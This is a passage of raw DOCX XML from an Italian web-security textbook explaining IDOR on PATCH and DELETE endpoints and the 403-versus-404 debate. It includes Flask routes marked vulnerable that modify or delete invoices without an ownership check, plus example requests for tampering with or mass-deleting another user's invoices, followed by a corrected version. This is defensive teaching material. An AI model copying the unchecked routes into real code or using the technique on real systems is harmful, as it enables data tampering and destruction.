        </w:rPr>
        <w:t xml:space="preserve">Relationship-Based Access Control</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: l’autorizzazione dipende dalla relazione utente-risorsa. Es.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">posso vedere il profilo di chi mi è amico</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sistemi come Google Zanzibar e librerie come SpiceDB lo implementano.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per applicazioni semplici come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, basta il controllo manuale. Per applicazioni grandi, una libreria di policy dedicata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="277"/>
    <w:bookmarkEnd w:id="278"/>
    <w:bookmarkStart w:id="283" w:name="idor-su-put-delete-post-ancora-peggio"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="518" w:name="sec_6_8"/>
      <w:r>
        <w:t xml:space="preserve">6.8 IDOR su PUT, DELETE, POST: ancora peggio</w:t>
      </w:r>
      <w:bookmarkEnd w:id="518"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finora abbiamo visto IDOR su una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">lettura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(GET). Le stesse vulnerabilità su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">modifiche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sono ancora più gravi.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="279" w:name="idor-su-putpatch-modifica-dati-altrui"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IDOR su PUT/PATCH: modifica dati altrui</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ❌ VULNERABILE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/api/fattura/&lt;int:fattura_id&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, methods</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"PATCH"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">])</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> modifica_fattura(fattura_id):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"non autenticato"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">401</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    dati </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> request.get_json()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"UPDATE fatture SET descrizione=? WHERE id=?"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                (dati[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"descrizione"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">], fattura_id))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mario manda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PATCH /api/fattura/3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{"descrizione": "Modificata"}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e cambia la fattura di Giulia.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mario ha ora il potere di modificare le fatture di chiunque.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="279"/>
    <w:bookmarkStart w:id="280" w:name="idor-su-delete-cancellazione-dati-altrui"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IDOR su DELETE: cancellazione dati altrui</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ❌ VULNERABILE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/api/fattura/&lt;int:fattura_id&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, methods</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"DELETE"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">])</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cancella_fattura(fattura_id):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"non autenticato"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">401</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"DELETE FROM fatture WHERE id=?"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, (fattura_id,))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mario invia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DELETE /api/fattura/3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La fattura di Giulia svanisce. Ripeti in loop e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cancelli tutte le fatture del database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="280"/>
    <w:bookmarkStart w:id="281" w:name="differenza-pratica-con-la-lettura"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Differenza pratica con la lettura</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una lettura non autorizzata viola la privacy. Una scrittura/cancellazione non autorizzata può:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1109"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">distruggere dati di lavoro altrui (anche per giorni di lavoro perso)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1109"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">essere usata per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">frodi finanziarie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Mario modifica il proprio saldo, oppure trasferisce denaro</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1109"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">creare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">danni reputazionali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se i contenuti modificati vengono visti da altri (tipo: sostituire il commento di un altro utente con qualcosa di offensivo)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1109"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">innescare effetti a cascata (la modifica scatena automaticamente azioni in altri sistemi)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per questo, la verifica di autorizzazione su scritture</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">deve essere ancora più rigorosa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="281"/>
    <w:bookmarkStart w:id="282" w:name="la-correzione-identica-nello-schema"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La correzione, identica nello schema</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ✅ SICURO</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/api/fattura/&lt;int:fattura_id&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, methods</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"PATCH"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">])</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> modifica_fattura(fattura_id):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"non autenticato"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">401</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    dati </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> request.get_json()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Verifica proprietà nella query stessa</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"UPDATE fatture SET descrizione=? "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"WHERE id=? AND utente_id=?"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                (dati[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"descrizione"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">], fattura_id, session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utente_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cur.rowcount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"errore"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"fattura non trovata"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">404</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> jsonify({</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"ok"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.rowcount</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ti dice quante righe sono state effettivamente modificate. Se è zero, o non esiste la fattura o non appartiene all’utente: in entrambi i casi rispondi 404.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="282"/>
    <w:bookmarkEnd w:id="283"/>
    <w:bookmarkStart w:id="288" w:name="perché-403-forbidden-e-non-404-not-found"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="519" w:name="sec_6_9"/>
      <w:r>
        <w:t xml:space="preserve">6.9 Perché 403 Forbidden e non 404 Not Found?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="519"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una sottigliezza che divide le opinioni anche tra esperti. Quando un utente autenticato chiede una risorsa che</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">esiste ma non gli appartiene</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, dovremmo restituire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">403 Forbidden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la risorsa esiste, ma tu non puoi vederla</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">404 Not Found</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non c’è nessuna risorsa qui</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)?</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="284" w:name="la-scuola-404-sempre"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La scuola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">404 sempre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Restituire 404 nasconde all’attaccante l’esistenza stessa della risorsa. Senza questa informazione, l’attaccante non può sapere se sta provando ID validi o no. Il codice del </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_6_7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">§6.7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> fa così.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vantaggio:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">maggiore segretezza, più difficile l’enumerazione mirata.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Svantaggio:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">un utente legittimo che riceve 404 sa di non avere una fattura corrispondente, ma non capisce se forse l’ha. Esperienza utente leggermente confusa.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="284"/>
    <w:bookmarkStart w:id="285" w:name="la-scuola-403-quando-appropriato"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La scuola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">403 quando appropriato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Restituire 403 è semanticamente corretto: la risorsa esiste, semplicemente non hai accesso. È più trasparente e diagnostico.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vantaggio:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">semantica HTTP corretta, debug più facile.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Svantaggio:</w:t>
      </w:r>
      <w:r>
